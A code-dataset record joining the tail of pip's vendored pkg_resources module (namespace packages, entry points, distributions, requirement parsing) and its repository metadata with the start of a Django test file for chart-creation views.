register_finder(pkgutil.ImpImporter, find_on_path)
# importlib's FileFinder supersedes ImpImporter on Python 3.3+
if hasattr(importlib_machinery, 'FileFinder'):
    register_finder(importlib_machinery.FileFinder, find_on_path)
# importer type -> namespace handler; namespace package name -> children
_declare_state('dict', _namespace_handlers={})
_declare_state('dict', _namespace_packages={})
def register_namespace_handler(importer_type, namespace_handler):
    """Register `namespace_handler` to declare namespace packages

    `importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
    handler), and `namespace_handler` is a callable like this::

        def namespace_handler(importer, path_entry, moduleName, module):
            # return a path_entry to use for child packages

    Namespace handlers are only called if the importer object has already
    agreed that it can handle the relevant path item, and they should only
    return a subpath if the module __path__ does not already contain an
    equivalent subpath.  For an example namespace handler, see
    ``pkg_resources.file_ns_handler``.
    """
    _namespace_handlers[importer_type] = namespace_handler
def _handle_ns(packageName, path_item):
    """Ensure that named package includes a subpath of path_item (if needed)"""
    importer = get_importer(path_item)
    if importer is None:
        # no importer can handle this path item
        return None
    loader = importer.find_module(packageName)
    if loader is None:
        # the package is not importable from this path item
        return None
    module = sys.modules.get(packageName)
    if module is None:
        # create a fresh namespace module and attach it to its parent
        module = sys.modules[packageName] = types.ModuleType(packageName)
        module.__path__ = []
        _set_parent_ns(packageName)
    elif not hasattr(module, '__path__'):
        raise TypeError("Not a package:", packageName)
    handler = _find_adapter(_namespace_handlers, importer)
    subpath = handler(importer, path_item, packageName, module)
    if subpath is not None:
        # append first so the loader sees the new entry, then re-sort
        # __path__ into sys.path order
        path = module.__path__
        path.append(subpath)
        loader.load_module(packageName)
        _rebuild_mod_path(path, packageName, module)
    return subpath
def _rebuild_mod_path(orig_path, package_name, module):
    """
    Rebuild module.__path__ ensuring that all entries are ordered
    corresponding to their sys.path order
    """
    sys_path = [_normalize_cached(p) for p in sys.path]

    def safe_sys_path_index(entry):
        # Entries not present on sys.path sort last (#520, #513).
        try:
            return sys_path.index(entry)
        except ValueError:
            return float('inf')

    def position_in_sys_path(path):
        # Strip the trailing package directories from `path`, then rank the
        # remaining prefix by its position in sys.path.
        depth = package_name.count('.') + 1
        prefix_parts = path.split(os.sep)[:-depth]
        return safe_sys_path_index(_normalize_cached(os.sep.join(prefix_parts)))

    orig_path.sort(key=position_in_sys_path)
    module.__path__[:] = [_normalize_cached(p) for p in orig_path]
def declare_namespace(packageName):
    """Declare that package 'packageName' is a namespace package"""
    # The import lock guards the module-level _namespace_packages registry
    # and the sys.modules mutations done by _handle_ns.
    _imp.acquire_lock()
    try:
        if packageName in _namespace_packages:
            # already declared; nothing to do
            return
        path, parent = sys.path, None
        if '.' in packageName:
            # recursively declare (and import) the parent package first,
            # then restrict the search path to the parent's __path__
            parent = '.'.join(packageName.split('.')[:-1])
            declare_namespace(parent)
            if parent not in _namespace_packages:
                __import__(parent)
            try:
                path = sys.modules[parent].__path__
            except AttributeError:
                raise TypeError("Not a package:", parent)
        # Track what packages are namespaces, so when new path items are added,
        # they can be updated
        _namespace_packages.setdefault(parent, []).append(packageName)
        _namespace_packages.setdefault(packageName, [])
        for path_item in path:
            # Ensure all the parent's path items are reflected in the child,
            # if they apply
            _handle_ns(packageName, path_item)
    finally:
        _imp.release_lock()
def fixup_namespace_packages(path_item, parent=None):
    """Ensure that previously-declared namespace packages include path_item"""
    _imp.acquire_lock()
    try:
        for pkg in _namespace_packages.get(parent, ()):
            child_path = _handle_ns(pkg, path_item)
            if child_path:
                # recurse so grandchildren pick up the new entry too
                fixup_namespace_packages(child_path, pkg)
    finally:
        _imp.release_lock()
def file_ns_handler(importer, path_item, packageName, module):
    """Compute an ns-package subpath for a filesystem or zipfile importer"""
    candidate = os.path.join(path_item, packageName.split('.')[-1])
    normalized = _normalize_cached(candidate)
    already_present = any(
        _normalize_cached(entry) == normalized
        for entry in module.__path__
    )
    # Only return the path if it's not already there
    if not already_present:
        return candidate
# Use the filesystem/zipfile subpath handler for the standard path-entry
# importers.
register_namespace_handler(pkgutil.ImpImporter, file_ns_handler)
register_namespace_handler(zipimport.zipimporter, file_ns_handler)

# importlib's FileFinder (Python 3.3+) replaces pkgutil.ImpImporter, so
# register for it too when available.
if hasattr(importlib_machinery, 'FileFinder'):
    register_namespace_handler(importlib_machinery.FileFinder, file_ns_handler)
def null_ns_handler(importer, path_item, packageName, module):
    # Fallback handler: contributes no subpath for unrecognized importers.
    return None


# Registering against ``object`` makes this the catch-all default handler.
register_namespace_handler(object, null_ns_handler)
def normalize_path(filename):
    """Normalize a file/dir name for comparison purposes"""
    # Resolve symlinks first, then apply platform case folding.
    resolved = os.path.realpath(filename)
    return os.path.normcase(resolved)
def _normalize_cached(filename, _cache={}):
    """Memoizing wrapper around normalize_path.

    The shared mutable default ``_cache`` is deliberate: it persists across
    calls and serves as the process-wide cache.
    """
    if filename not in _cache:
        _cache[filename] = normalize_path(filename)
    return _cache[filename]
def _is_unpacked_egg(path):
"""
Determine if given path appears to be an unpacked egg.
"""
return (
path.lower().endswith('.egg')
)
def _set_parent_ns(packageName):
parts = packageName.split('.')
name = parts.pop()
if parts:
parent = '.'.join(parts)
setattr(sys.modules[parent], name, sys.modules[packageName])
def yield_lines(strs):
    """Yield non-empty/non-comment lines of a string or sequence"""
    if isinstance(strs, six.string_types):
        for raw_line in strs.splitlines():
            stripped = raw_line.strip()
            # skip blank lines/comments
            if stripped and not stripped.startswith('#'):
                yield stripped
    else:
        # Recurse into (possibly nested) iterables of strings.
        for item in strs:
            for line in yield_lines(item):
                yield line
MODULE = re.compile(r"\w+(\.\w+)*$").match
EGG_NAME = re.compile(
r"""
(?P<name>[^-]+) (
-(?P<ver>[^-]+) (
-py(?P<pyver>[^-]+) (
-(?P<plat>.+)
)?
)?
)?
""",
re.VERBOSE | re.IGNORECASE,
).match
class EntryPoint(object):
    """Object representing an advertised importable object"""

    def __init__(self, name, module_name, attrs=(), extras=(), dist=None):
        if not MODULE(module_name):
            raise ValueError("Invalid module name", module_name)
        self.name = name
        self.module_name = module_name
        self.attrs = tuple(attrs)
        # Validate the extras by round-tripping them through a dummy
        # requirement; Requirement.parse raises on malformed extra names.
        self.extras = Requirement.parse(("x[%s]" % ','.join(extras))).extras
        self.dist = dist

    def __str__(self):
        # Render back to the canonical "name = module:attrs [extras]" form.
        s = "%s = %s" % (self.name, self.module_name)
        if self.attrs:
            s += ':' + '.'.join(self.attrs)
        if self.extras:
            s += ' [%s]' % ','.join(self.extras)
        return s

    def __repr__(self):
        return "EntryPoint.parse(%r)" % str(self)

    def load(self, require=True, *args, **kwargs):
        """
        Require packages for this EntryPoint, then resolve it.
        """
        if not require or args or kwargs:
            warnings.warn(
                "Parameters to load are deprecated. Call .resolve and "
                ".require separately.",
                DeprecationWarning,
                stacklevel=2,
            )
        if require:
            self.require(*args, **kwargs)
        return self.resolve()

    def resolve(self):
        """
        Resolve the entry point from its module and attrs.
        """
        module = __import__(self.module_name, fromlist=['__name__'], level=0)
        try:
            # Walk the dotted attribute chain, e.g. attrs=('A', 'b') ->
            # getattr(getattr(module, 'A'), 'b').
            return functools.reduce(getattr, self.attrs, module)
        except AttributeError as exc:
            raise ImportError(str(exc))

    def require(self, env=None, installer=None):
        # Resolve and activate the distributions this entry point's extras
        # depend on, adding them to the global working set.
        if self.extras and not self.dist:
            raise UnknownExtra("Can't require() without a distribution", self)
        reqs = self.dist.requires(self.extras)
        items = working_set.resolve(reqs, env, installer)
        list(map(working_set.add, items))

    # Regex for a single "name = module[:attrs] [extras]" line.
    pattern = re.compile(
        r'\s*'
        r'(?P<name>.+?)\s*'
        r'=\s*'
        r'(?P<module>[\w.]+)\s*'
        r'(:\s*(?P<attr>[\w.]+))?\s*'
        r'(?P<extras>\[.*\])?\s*$'
    )

    @classmethod
    def parse(cls, src, dist=None):
        """Parse a single entry point from string `src`

        Entry point syntax follows the form::

            name = some.module:some.attr [extra1, extra2]

        The entry name and module name are required, but the ``:attrs`` and
        ``[extras]`` parts are optional
        """
        m = cls.pattern.match(src)
        if not m:
            msg = "EntryPoint must be in 'name=module:attrs [extras]' format"
            raise ValueError(msg, src)
        res = m.groupdict()
        extras = cls._parse_extras(res['extras'])
        attrs = res['attr'].split('.') if res['attr'] else ()
        return cls(res['name'], res['module'], attrs, extras, dist)

    @classmethod
    def _parse_extras(cls, extras_spec):
        # Reuse Requirement parsing to validate the bracketed extras list;
        # a version specifier inside the brackets is not allowed here.
        if not extras_spec:
            return ()
        req = Requirement.parse('x' + extras_spec)
        if req.specs:
            raise ValueError()
        return req.extras

    @classmethod
    def parse_group(cls, group, lines, dist=None):
        """Parse an entry point group"""
        if not MODULE(group):
            raise ValueError("Invalid group name", group)
        this = {}
        for line in yield_lines(lines):
            ep = cls.parse(line, dist)
            if ep.name in this:
                raise ValueError("Duplicate entry point", group, ep.name)
            this[ep.name] = ep
        return this

    @classmethod
    def parse_map(cls, data, dist=None):
        """Parse a map of entry point groups"""
        # Accept either a {group: lines} dict or INI-style sectioned text.
        if isinstance(data, dict):
            data = data.items()
        else:
            data = split_sections(data)
        maps = {}
        for group, lines in data:
            if group is None:
                if not lines:
                    continue
                raise ValueError("Entry points must be listed in groups")
            group = group.strip()
            if group in maps:
                raise ValueError("Duplicate group name", group)
            maps[group] = cls.parse_group(group, lines, dist)
        return maps
def _remove_md5_fragment(location):
if not location:
return ''
parsed = urllib.parse.urlparse(location)
if parsed[-1].startswith('md5='):
return urllib.parse.urlunparse(parsed[:-1] + ('',))
return location
def _version_from_file(lines):
    """
    Given an iterable of lines from a Metadata file, return
    the value of the Version field, if present, or None otherwise.
    """
    version_lines = (
        line for line in lines if line.lower().startswith('version:')
    )
    # Take the first "Version:" line; fall back to '' when absent so the
    # empty case still flows through safe_version() exactly as before.
    first = next(version_lines, '')
    _, _, value = first.partition(':')
    return safe_version(value.strip()) or None
class Distribution(object):
    """Wrap an actual or potential sys.path entry w/metadata"""
    # Name of the metadata file this kind of distribution carries.
    PKG_INFO = 'PKG-INFO'

    def __init__(self, location=None, metadata=None, project_name=None,
                 version=None, py_version=PY_MAJOR, platform=None,
                 precedence=EGG_DIST):
        self.project_name = safe_name(project_name or 'Unknown')
        # Only set _version eagerly when given; otherwise the `version`
        # property lazily reads it from metadata.
        if version is not None:
            self._version = safe_version(version)
        self.py_version = py_version
        self.platform = platform
        self.location = location
        self.precedence = precedence
        self._provider = metadata or empty_provider

    @classmethod
    def from_location(cls, location, basename, metadata=None, **kw):
        # Pick the Distribution subclass from the filename extension and
        # parse name/version/pyver/platform out of the egg-style basename.
        project_name, version, py_version, platform = [None] * 4
        basename, ext = os.path.splitext(basename)
        if ext.lower() in _distributionImpl:
            cls = _distributionImpl[ext.lower()]

            match = EGG_NAME(basename)
            if match:
                project_name, version, py_version, platform = match.group(
                    'name', 'ver', 'pyver', 'plat'
                )
        return cls(
            location, metadata, project_name=project_name, version=version,
            py_version=py_version, platform=platform, **kw
        )._reload_version()

    def _reload_version(self):
        # Hook for subclasses to re-derive the version from metadata.
        return self

    @property
    def hashcmp(self):
        # Canonical tuple used for hashing and all rich comparisons.
        return (
            self.parsed_version,
            self.precedence,
            self.key,
            _remove_md5_fragment(self.location),
            self.py_version or '',
            self.platform or '',
        )

    def __hash__(self):
        return hash(self.hashcmp)

    def __lt__(self, other):
        return self.hashcmp < other.hashcmp

    def __le__(self, other):
        return self.hashcmp <= other.hashcmp

    def __gt__(self, other):
        return self.hashcmp > other.hashcmp

    def __ge__(self, other):
        return self.hashcmp >= other.hashcmp

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            # It's not a Distribution, so they are not equal
            return False
        return self.hashcmp == other.hashcmp

    def __ne__(self, other):
        return not self == other

    # These properties have to be lazy so that we don't have to load any
    # metadata until/unless it's actually needed. (i.e., some distributions
    # may not know their name or version without loading PKG-INFO)

    @property
    def key(self):
        # Lowercased project name, cached on first access.
        try:
            return self._key
        except AttributeError:
            self._key = key = self.project_name.lower()
            return key

    @property
    def parsed_version(self):
        # Cached packaging version object for comparisons/sorting.
        if not hasattr(self, "_parsed_version"):
            self._parsed_version = parse_version(self.version)
        return self._parsed_version

    def _warn_legacy_version(self):
        LV = packaging.version.LegacyVersion
        is_legacy = isinstance(self._parsed_version, LV)
        if not is_legacy:
            return

        # While an empty version is technically a legacy version and
        # is not a valid PEP 440 version, it's also unlikely to
        # actually come from someone and instead it is more likely that
        # it comes from setuptools attempting to parse a filename and
        # including it in the list. So for that we'll gate this warning
        # on if the version is anything at all or not.
        if not self.version:
            return

        tmpl = textwrap.dedent("""
            '{project_name} ({version})' is being parsed as a legacy,
            non PEP 440,
            version. You may find odd behavior and sort order.
            In particular it will be sorted as less than 0.0. It
            is recommended to migrate to PEP 440 compatible
            versions.
            """).strip().replace('\n', ' ')

        warnings.warn(tmpl.format(**vars(self)), PEP440Warning)

    @property
    def version(self):
        try:
            return self._version
        except AttributeError:
            # Fall back to reading the Version header from metadata.
            version = _version_from_file(self._get_metadata(self.PKG_INFO))
            if version is None:
                tmpl = "Missing 'Version:' header and/or %s file"
                raise ValueError(tmpl % self.PKG_INFO, self)
            return version

    @property
    def _dep_map(self):
        # Cached mapping of extra-name (or None for unconditional deps)
        # to a list of Requirement objects, built from requires.txt /
        # depends.txt. Sections named "extra:marker" are filtered by
        # evaluating the environment marker.
        try:
            return self.__dep_map
        except AttributeError:
            dm = self.__dep_map = {None: []}
            for name in 'requires.txt', 'depends.txt':
                for extra, reqs in split_sections(self._get_metadata(name)):
                    if extra:
                        if ':' in extra:
                            extra, marker = extra.split(':', 1)
                            if invalid_marker(marker):
                                # XXX warn
                                reqs = []
                            elif not evaluate_marker(marker):
                                reqs = []
                        extra = safe_extra(extra) or None
                    dm.setdefault(extra, []).extend(parse_requirements(reqs))
            return dm

    def requires(self, extras=()):
        """List of Requirements needed for this distro if `extras` are used"""
        dm = self._dep_map
        deps = []
        deps.extend(dm.get(None, ()))
        for ext in extras:
            try:
                deps.extend(dm[safe_extra(ext)])
            except KeyError:
                raise UnknownExtra(
                    "%s has no such extra feature %r" % (self, ext)
                )
        return deps

    def _get_metadata(self, name):
        # Yield the lines of metadata file `name`, or nothing if absent.
        if self.has_metadata(name):
            for line in self.get_metadata_lines(name):
                yield line

    def activate(self, path=None, replace=False):
        """Ensure distribution is importable on `path` (default=sys.path)"""
        if path is None:
            path = sys.path
        self.insert_on(path, replace=replace)
        if path is sys.path:
            fixup_namespace_packages(self.location)
            for pkg in self._get_metadata('namespace_packages.txt'):
                if pkg in sys.modules:
                    declare_namespace(pkg)

    def egg_name(self):
        """Return what this distribution's standard .egg filename should be"""
        filename = "%s-%s-py%s" % (
            to_filename(self.project_name), to_filename(self.version),
            self.py_version or PY_MAJOR
        )

        if self.platform:
            filename += '-' + self.platform
        return filename

    def __repr__(self):
        if self.location:
            return "%s (%s)" % (self, self.location)
        else:
            return str(self)

    def __str__(self):
        try:
            version = getattr(self, 'version', None)
        except ValueError:
            # version property raises ValueError when metadata is missing.
            version = None
        version = version or "[unknown version]"
        return "%s %s" % (self.project_name, version)

    def __getattr__(self, attr):
        """Delegate all unrecognized public attributes to .metadata provider"""
        if attr.startswith('_'):
            raise AttributeError(attr)
        return getattr(self._provider, attr)

    @classmethod
    def from_filename(cls, filename, metadata=None, **kw):
        return cls.from_location(
            _normalize_cached(filename), os.path.basename(filename), metadata,
            **kw
        )

    def as_requirement(self):
        """Return a ``Requirement`` that matches this distribution exactly"""
        # "===" pins arbitrary (legacy) versions; "==" is used for valid
        # PEP 440 versions.
        if isinstance(self.parsed_version, packaging.version.Version):
            spec = "%s==%s" % (self.project_name, self.parsed_version)
        else:
            spec = "%s===%s" % (self.project_name, self.parsed_version)

        return Requirement.parse(spec)

    def load_entry_point(self, group, name):
        """Return the `name` entry point of `group` or raise ImportError"""
        ep = self.get_entry_info(group, name)
        if ep is None:
            raise ImportError("Entry point %r not found" % ((group, name),))
        return ep.load()

    def get_entry_map(self, group=None):
        """Return the entry point map for `group`, or the full entry map"""
        try:
            ep_map = self._ep_map
        except AttributeError:
            # Parsed lazily from entry_points.txt and cached.
            ep_map = self._ep_map = EntryPoint.parse_map(
                self._get_metadata('entry_points.txt'), self
            )
        if group is not None:
            return ep_map.get(group, {})
        return ep_map

    def get_entry_info(self, group, name):
        """Return the EntryPoint object for `group`+`name`, or ``None``"""
        return self.get_entry_map(group).get(name)

    def insert_on(self, path, loc=None, replace=False):
        """Ensure self.location is on path

        If replace=False (default):
            - If location is already in path anywhere, do nothing.
            - Else:
              - If it's an egg and its parent directory is on path,
                insert just ahead of the parent.
              - Else: add to the end of path.
        If replace=True:
            - If location is already on path anywhere (not eggs)
              or higher priority than its parent (eggs)
              do nothing.
            - Else:
              - If it's an egg and its parent directory is on path,
                insert just ahead of the parent,
                removing any lower-priority entries.
              - Else: add it to the front of path.
        """

        loc = loc or self.location
        if not loc:
            return

        nloc = _normalize_cached(loc)
        bdir = os.path.dirname(nloc)
        # npath mirrors path with normalized entries for comparison; the
        # two lists are kept in lockstep below.
        npath = [(p and _normalize_cached(p) or p) for p in path]

        for p, item in enumerate(npath):
            if item == nloc:
                if replace:
                    break
                else:
                    # don't modify path (even removing duplicates) if found and not replace
                    return
            elif item == bdir and self.precedence == EGG_DIST:
                # if it's an .egg, give it precedence over its directory
                # UNLESS it's already been added to sys.path and replace=False
                if (not replace) and nloc in npath[p:]:
                    return
                if path is sys.path:
                    self.check_version_conflict()
                path.insert(p, loc)
                npath.insert(p, nloc)
                break
        else:
            # Not found at all: append (or prepend when replacing).
            if path is sys.path:
                self.check_version_conflict()
            if replace:
                path.insert(0, loc)
            else:
                path.append(loc)
            return

        # p is the spot where we found or inserted loc; now remove duplicates
        while True:
            try:
                np = npath.index(nloc, p + 1)
            except ValueError:
                break
            else:
                del npath[np], path[np]
                # keep scanning for further duplicates past the removed entry
                p = np

        return

    def check_version_conflict(self):
        # Warn when a top-level module of this distribution was already
        # imported from a different location than the one being added.
        if self.key == 'setuptools':
            # ignore the inevitable setuptools self-conflicts :(
            return

        nsp = dict.fromkeys(self._get_metadata('namespace_packages.txt'))
        loc = normalize_path(self.location)
        for modname in self._get_metadata('top_level.txt'):
            if (modname not in sys.modules or modname in nsp
                    or modname in _namespace_packages):
                continue
            if modname in ('pkg_resources', 'setuptools', 'site'):
                continue
            fn = getattr(sys.modules[modname], '__file__', None)
            if fn and (normalize_path(fn).startswith(loc) or
                       fn.startswith(self.location)):
                continue
            issue_warning(
                "Module %s was already imported from %s, but %s is being added"
                " to sys.path" % (modname, fn, self.location),
            )

    def has_version(self):
        # True when a usable version is available (metadata present).
        try:
            self.version
        except ValueError:
            issue_warning("Unbuilt egg for " + repr(self))
            return False
        return True

    def clone(self, **kw):
        """Copy this distribution, substituting in any changed keyword args"""
        names = 'project_name version py_version platform location precedence'
        for attr in names.split():
            kw.setdefault(attr, getattr(self, attr, None))
        kw.setdefault('metadata', self._provider)
        return self.__class__(**kw)

    @property
    def extras(self):
        # All declared extra names (excludes the unconditional None bucket).
        return [dep for dep in self._dep_map if dep]
class EggInfoDistribution(Distribution):
    """Distribution backed by an ``.egg-info`` metadata directory/file."""

    def _reload_version(self):
        """
        Packages installed by distutils (e.g. numpy or scipy),
        which uses an old safe_version, and so
        their version numbers can get mangled when
        converted to filenames (e.g., 1.11.0.dev0+2329eae to
        1.11.0.dev0_2329eae). These distributions will not be
        parsed properly
        downstream by Distribution and safe_version, so
        take an extra step and try to get the version number from
        the metadata file itself instead of the filename.
        """
        md_version = _version_from_file(self._get_metadata(self.PKG_INFO))
        if md_version:
            self._version = md_version
        return self
class DistInfoDistribution(Distribution):
    """Wrap an actual or potential sys.path entry w/metadata, .dist-info style"""
    PKG_INFO = 'METADATA'
    # Matches "(1.0" / ", 2.0)"-style version tokens inside a specifier.
    EQEQ = re.compile(r"([\(,])\s*(\d.*?)\s*([,\)])")

    @property
    def _parsed_pkg_info(self):
        """Parse and cache metadata"""
        try:
            return self._pkg_info
        except AttributeError:
            # METADATA uses email/RFC 822 header syntax.
            metadata = self.get_metadata(self.PKG_INFO)
            self._pkg_info = email.parser.Parser().parsestr(metadata)
            return self._pkg_info

    @property
    def _dep_map(self):
        # Note: __dep_map is name-mangled per-class, so this cache is
        # independent of the base class's requires.txt-based cache.
        try:
            return self.__dep_map
        except AttributeError:
            self.__dep_map = self._compute_dependencies()
            return self.__dep_map

    def _compute_dependencies(self):
        """Recompute this distribution's dependencies."""
        dm = self.__dep_map = {None: []}

        reqs = []
        # Including any condition expressions
        for req in self._parsed_pkg_info.get_all('Requires-Dist') or []:
            reqs.extend(parse_requirements(req))

        def reqs_for_extra(extra):
            # Requirements whose marker is satisfied for the given extra
            # (a requirement without a marker always applies).
            for req in reqs:
                if not req.marker or req.marker.evaluate({'extra': extra}):
                    yield req

        common = frozenset(reqs_for_extra(None))
        dm[None].extend(common)

        for extra in self._parsed_pkg_info.get_all('Provides-Extra') or []:
            s_extra = safe_extra(extra.strip())
            # Only the requirements unique to this extra.
            dm[s_extra] = list(frozenset(reqs_for_extra(extra)) - common)

        return dm
# Maps a metadata extension to the Distribution subclass that knows how
# to read that metadata format (see Distribution.from_location).
_distributionImpl = {
    '.egg': Distribution,
    '.egg-info': EggInfoDistribution,
    '.dist-info': DistInfoDistribution,
}
def issue_warning(*args, **kw):
    """Emit a warning attributed to the first caller outside this module."""
    level = 1
    g = globals()
    try:
        # find the first stack frame that is *not* code in
        # the pkg_resources module, to use for the warning
        while sys._getframe(level).f_globals is g:
            level += 1
    except ValueError:
        # Ran off the top of the stack; fall back to the deepest frame seen.
        pass
    warnings.warn(stacklevel=level + 1, *args, **kw)
class RequirementParseError(ValueError):
    """Raised when a requirement string cannot be parsed."""

    def __str__(self):
        return ' '.join(self.args)
def parse_requirements(strs):
    """Yield ``Requirement`` objects for each specification in `strs`

    `strs` must be a string, or a (possibly-nested) iterable thereof.
    """
    # create a steppable iterator, so we can handle \-continuations
    lines = iter(yield_lines(strs))

    for line in lines:
        # Drop comments -- a hash without a space may be in a URL.
        if ' #' in line:
            line = line[:line.find(' #')]
        # If there is a line continuation, drop it, and append the next line.
        if line.endswith('\\'):
            # NOTE(review): [:-2] drops the backslash AND the character
            # before it; this matches upstream pkg_resources behavior and
            # is kept as-is (verify before "fixing").
            line = line[:-2].strip()
            line += next(lines)
        yield Requirement(line)
class Requirement(packaging.requirements.Requirement):
    """pkg_resources-flavored requirement with legacy attributes
    (``project_name``, ``key``, ``specs``, ``hashCmp``) layered on top of
    ``packaging.requirements.Requirement``."""

    def __init__(self, requirement_string):
        """DO NOT CALL THIS UNDOCUMENTED METHOD; use Requirement.parse()!"""
        try:
            super(Requirement, self).__init__(requirement_string)
        except packaging.requirements.InvalidRequirement as e:
            raise RequirementParseError(str(e))
        self.unsafe_name = self.name
        project_name = safe_name(self.name)
        self.project_name, self.key = project_name, project_name.lower()
        # Legacy (operator, version) pairs derived from the specifier set.
        self.specs = [
            (spec.operator, spec.version) for spec in self.specifier]
        self.extras = tuple(map(safe_extra, self.extras))
        # Identity tuple used for __eq__ and __hash__.
        self.hashCmp = (
            self.key,
            self.specifier,
            frozenset(self.extras),
            str(self.marker) if self.marker else None,
        )
        self.__hash = hash(self.hashCmp)

    def __eq__(self, other):
        return (
            isinstance(other, Requirement) and
            self.hashCmp == other.hashCmp
        )

    def __ne__(self, other):
        return not self == other

    def __contains__(self, item):
        # Supports both "dist in req" and "version_string in req".
        if isinstance(item, Distribution):
            if item.key != self.key:
                return False
            item = item.version
        # Allow prereleases always in order to match the previous behavior of
        # this method. In the future this should be smarter and follow PEP 440
        # more accurately.
        return self.specifier.contains(item, prereleases=True)

    def __hash__(self):
        return self.__hash

    def __repr__(self):
        return "Requirement.parse(%r)" % str(self)

    @staticmethod
    def parse(s):
        # Exactly one requirement must be present in `s`.
        req, = parse_requirements(s)
        return req
def _get_mro(cls):
"""Get an mro for a type or classic class"""
if not isinstance(cls, type):
class cls(cls, object):
pass
return cls.__mro__[1:]
return cls.__mro__
def _find_adapter(registry, ob):
    """Return an adapter factory for `ob` from `registry`"""
    candidates = _get_mro(getattr(ob, '__class__', type(ob)))
    # Membership test (not .get) preserves the original behavior when a
    # registry entry's value is None; returns None when nothing matches.
    return next((registry[t] for t in candidates if t in registry), None)
def ensure_directory(path):
    """Ensure that the parent directory of `path` exists"""
    dirname = os.path.dirname(path)
    try:
        os.makedirs(dirname)
    except OSError:
        # EAFP: another process/thread may create (or have created) the
        # directory between any check and makedirs (TOCTOU). Only re-raise
        # when the directory genuinely still doesn't exist.
        if not os.path.isdir(dirname):
            raise
def _bypass_ensure_directory(path):
    """Sandbox-bypassing version of ensure_directory()"""
    # `split`, `isdir`, and `mkdir` here are the raw os-level functions
    # bound at module import time, so the setuptools sandbox cannot
    # intercept them.
    if not WRITE_SUPPORT:
        raise IOError('"os.mkdir" not supported on this platform.')
    dirname, filename = split(path)
    if dirname and filename and not isdir(dirname):
        # Recursively create the ancestors first, mkdir one level at a time.
        _bypass_ensure_directory(dirname)
        mkdir(dirname, 0o755)
def split_sections(s):
    """Split a string or iterable thereof into (section, content) pairs

    Each ``section`` is a stripped version of the section header ("[section]")
    and each ``content`` is a list of stripped lines excluding blank lines and
    comment-only lines.  If there are any such lines before the first section
    header, they're returned in a first ``section`` of ``None``.
    """
    section = None
    content = []
    for line in yield_lines(s):
        # Ordinary content line: accumulate under the current section.
        if not line.startswith("["):
            content.append(line)
            continue
        if not line.endswith("]"):
            raise ValueError("Invalid section heading", line)
        # New section header: flush the previous section first (but skip
        # an entirely empty leading None section).
        if section or content:
            yield section, content
        section = line[1:-1].strip()
        content = []
    # wrap up last segment
    yield section, content
def _mkstemp(*args, **kw):
    """tempfile.mkstemp that works inside the setuptools sandbox by
    temporarily restoring the real ``os.open``."""
    old_open = os.open
    try:
        # temporarily bypass sandboxing
        os.open = os_open
        return tempfile.mkstemp(*args, **kw)
    finally:
        # and then put it back
        os.open = old_open
# Silence the PEP440Warning by default, so that end users don't get hit by it
# randomly just because they use pkg_resources. We want to append the rule
# because we want earlier uses of filterwarnings to take precedence over this
# one. (Consumers who do want to see it can add their own filter.)
warnings.filterwarnings("ignore", category=PEP440Warning, append=True)
# from jaraco.functools 1.3
def _call_aside(f, *args, **kwargs):
    """Call ``f`` once with the given arguments, then return ``f``.

    Used below as a decorator to run module-initialization functions at
    import time while keeping them addressable by name.
    """
    f(*args, **kwargs)
    return f
@_call_aside
def _initialize(g=globals()):
    "Set up global resource manager (deliberately not state-saved)"
    manager = ResourceManager()
    g['_manager'] = manager
    # Re-export every public ResourceManager method (resource_string,
    # resource_filename, ...) as a module-level function.
    for name in dir(manager):
        if not name.startswith('_'):
            g[name] = getattr(manager, name)
@_call_aside
def _initialize_master_working_set():
    """
    Prepare the master working set and make the ``require()``
    API available.

    This function has explicit effects on the global state
    of pkg_resources. It is intended to be invoked once at
    the initialization of this module.

    Invocation by other packages is unsupported and done
    at their own risk.
    """
    working_set = WorkingSet._build_master()
    _declare_state('object', working_set=working_set)
    # Module-level conveniences bound to the master working set.
    require = working_set.require
    iter_entry_points = working_set.iter_entry_points
    add_activation_listener = working_set.subscribe
    run_script = working_set.run_script
    # backward compatibility
    run_main = run_script
    # Activate all distributions already on sys.path with replace=False and
    # ensure that all distributions added to the working set in the future
    # (e.g. by calling ``require()``) will get activated as well,
    # with higher priority (replace=True).
    dist = None  # ensure dist is defined for del dist below
    for dist in working_set:
        dist.activate(replace=False)
    del dist
    add_activation_listener(lambda dist: dist.activate(replace=True), existing=False)
    working_set.entries = []
    # match order
    list(map(working_set.add_entry, sys.path))
    # Export all the locals defined above (require, run_script, ...) as
    # module-level names.
    globals().update(locals())
| {
"content_hash": "41eb33243140843a1ffb8d85416eafad",
"timestamp": "",
"source": "github",
"line_count": 3028,
"max_line_length": 91,
"avg_line_length": 33.80680317040951,
"alnum_prop": 0.5980442916174158,
"repo_name": "Hoekz/hackness-monster",
"id": "8ac7f2fa80f551bcbf2cc0a8c4f7cc4735c8d5ec",
"size": "102385",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "venv/lib/python2.7/site-packages/pip/_vendor/pkg_resources/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "5939"
},
{
"name": "CSS",
"bytes": "17794"
},
{
"name": "HTML",
"bytes": "7238"
},
{
"name": "JavaScript",
"bytes": "34519"
},
{
"name": "Python",
"bytes": "3605942"
},
{
"name": "Shell",
"bytes": "3244"
}
],
"symlink_target": ""
} |
from test_plus.test import TestCase
from django.test import Client
# from unittest import skip
class Testnew_chart(TestCase):
    """View tests for the chart-creation page at ``/charts/``."""

    def setUp(self):
        self.client = Client()
        # self.client.login(username='fred', password='secret')

    def test_charts_renders_new_charts(self):
        """GET /charts/ renders the new-chart template."""
        response = self.client.get('/charts/')
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'charts/new_chart.html')

    def test_new_charts_can_pass_session_content_after_POST(self):
        """POSTed CSV data is stored in the session under 'content'."""
        # Renamed from `str`, which shadowed the builtin of the same name.
        payload = '1,2\r\n3,4\r\n5,6'
        response = self.client.post('/charts/', {'data': payload})
        self.assertEqual(response.status_code, 302)
        self.assertEqual(self.client.session['content'], payload)

    def test_new_charts_redirects_after_POST(self):
        """A successful POST redirects to the preview page."""
        response = self.client.post('/charts/', {'data': '1,2'}, follow=True)
        last_url, status_code = response.redirect_chain[-1]
        self.assertEqual(response.status_code, 200)
        self.assertEqual(last_url, '/charts/preview/')
        self.assertTemplateUsed(response, 'charts/preview_chart.html')

    def test_new_charts_contains_Preview_Chart(self):
        """The page exposes the 'Preview Chart' action."""
        response = self.client.get('/charts/')
        self.assertContains(response, "Preview Chart")
class Testpreview_chart(TestCase):
